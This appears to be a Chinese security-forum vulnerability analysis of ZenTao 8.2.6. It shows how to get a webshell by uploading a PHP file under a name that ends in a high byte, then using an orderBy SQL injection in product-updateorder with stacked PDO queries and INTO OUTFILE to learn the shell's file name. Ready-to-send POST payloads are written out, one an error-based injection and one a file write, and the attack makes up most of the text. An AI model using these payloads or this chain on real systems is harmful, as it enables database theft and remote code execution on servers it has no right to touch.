禅道826版本一定条件getshell
该隐 漏洞分析 11414浏览 · 2017-04-21 08:10

> 之前和一个朋友一直在讨论禅道获取webshell的方法,折腾了一天左右,最后还是在命令执行的地方拿到shell的。说来也是惭愧,这两天又研究了一下,又发现了一个低版本getshell的方法,最新版本是不行的,我测试的版本是8.2.6。最新版本9.1是不行的,其它版本未测试。

一、上传点
// D:\wamp\www\zentao826\module\file\control.php
public function ajaxUpload()
{
    $file = $this->file->getUpload('imgFile');
    $file = $file[0];
    if($file)
    {
        if($file['size'] == 0) die(json_encode(array('error' => 1, 'message' => $this->lang->file->errorFileUpload)));
        if(@move_uploaded_file($file['tmpname'], $this->file->savePath . $file['pathname']))
        {
            /* Compress image for jpg and bmp. */
            $file = $this->file->compressImage($file);

            $file['addedBy']    = $this->app->user->account;
            $file['addedDate']  = helper::today();
            unset($file['tmpname']);
            $this->dao->insert(TABLE_FILE)->data($file)->exec();

            $url = $this->file->webPath . $file['pathname'];
            die(json_encode(array('error' => 0, 'url' => $url)));
        }
        else
        {
            $error = strip_tags(sprintf($this->lang->file->errorCanNotWrite, $this->file->savePath, $this->file->savePath));
            die(json_encode(array('error' => 1, 'message' => $error)));
        }
    }
}

这里,我们可以用burpsuite抓包将文件名改为xxxx.php**可以是{\x80-\x99}。这样,我们就可以成功上传一个shell,但是die(json_encode(array('result' => 'success', 'message' => $this->lang->saveSuccess)));会错误而不会返回文件的地址。

二、SQL注入的根源

> 问题出在oderBy函数

// D:\wamp\www\zentao826\lib\base\dao\dao.class.php
public function orderBy($order)
{
    if($this->inCondition and !$this->conditionIsTrue) return $this;

    $order = str_replace(array('|', '', '_'), ' ', $order);

    /* Add "`" in order string. */
    /* When order has limit string. */
    $pos    = stripos($order, 'limit');
    $orders = $pos ? substr($order, 0, $pos) : $order;
    $limit  = $pos ? substr($order, $pos) : '';

    $orders = explode(',', $orders);
    foreach($orders as $i => $order)
    {
        $orderParse = explode(' ', trim($order));
        foreach($orderParse as $key => $value)
        {
            $value = trim($value);
            if(empty($value) or strtolower($value) == 'desc' or strtolower($value) == 'asc') continue;

            $field = $value;
            /* such as t1.id field. */
            if(strpos($value, '.') !== false) list($table, $field) = explode('.', $field);
            /* Ignore order with function e.g. order by length(tag) asc. */
            if(strpos($field, '(') === false and strpos($field, '`') === false) $field = "`$field`";

            $orderParse[$key] = isset($table) ? $table . '.' . $field :  $field;
            unset($table);
        }
        $orders[$i] = join(' ', $orderParse);
    }
    $order = join(',', $orders) . ' ' . $limit;

    $this->sql .= ' ' . DAO::ORDERBY . " $order";
    return $this;
}

> 这段代码是有问题的,order参数经过了一些处理就直接拼接到了SQL查询语句中,但是问题在于,一些处理并没有针对安全处理。不过有下面几点可能会出现问题,具体为什么看看代码就知道了。

  • 最好不好出现空格
  • 最好不好出现点
  • 最好不要出现下划线
  • order by之后不能使用union语句
  • 可以报错或者盲注
三、注入点
// D:\wamp\www\zentao826\module\product\control.php
public function updateOrder()
{
    $idList   = explode(',', trim($this->post->products, ','));
    $orderBy  = $this->post->orderBy;
    if(strpos($orderBy, 'order') === false) return false;

    $products = $this->dao->select('id,`order`')->from(TABLE_PRODUCT)->where('id')->in($idList)->orderBy($orderBy)->fetchPairs('order', 'id');
    foreach($products as $order => $id)
    {
        $newID = array_shift($idList);
        if($id == $newID) continue;
        $this->dao->update(TABLE_PRODUCT)->set('`order`')->eq($order)->where('id')->eq($newID)->exec();
    }
}

因此我们的payload就是

http://zentao826.me/product-updateorder.html
POST:products=1,2&orderBy=`order`and/**/polygon((select/**/*/**/from(select/**/*/**/from(select/**/user())a)b))%23

虽说可以盲注了,但是你会发现表名、字段名出现了下划线就不能注入了。。。

四、如果没有下划线

> 没有下划线的情况,在这里盲注也是很麻烦的,在最上面,我们提到了一个上传点,但是没有办法拿到文件名。但是,如果没有下划线能不能从注入点切入呢?禅道这套系统使用的是PDO操作数据库,记得很久之前做过一道CTF,当时就是利用PDO可以多语句执行的特性。

因此这里的执行步骤就是:

  • 现在后台上传一个文件,文件名为xxxx.php\x81
  • 利用注入写文件,把file表中的数据写入到文件中
  • 访问文件,得到文件名

payload如下

http://zentao826.me/product-updateorder.html
POST:products=1,2&orderBy=`order`;select/**/*/**/from/**/file/**/into/**/outfile/**/'d:/2'#

条件限制

  • MySQL当前账户有文件操作的权限
  • 禅道数据库表名无前缀
  • 至少有一个可以上传文件的后台账号
2 条评论
某人
表情
可输入 255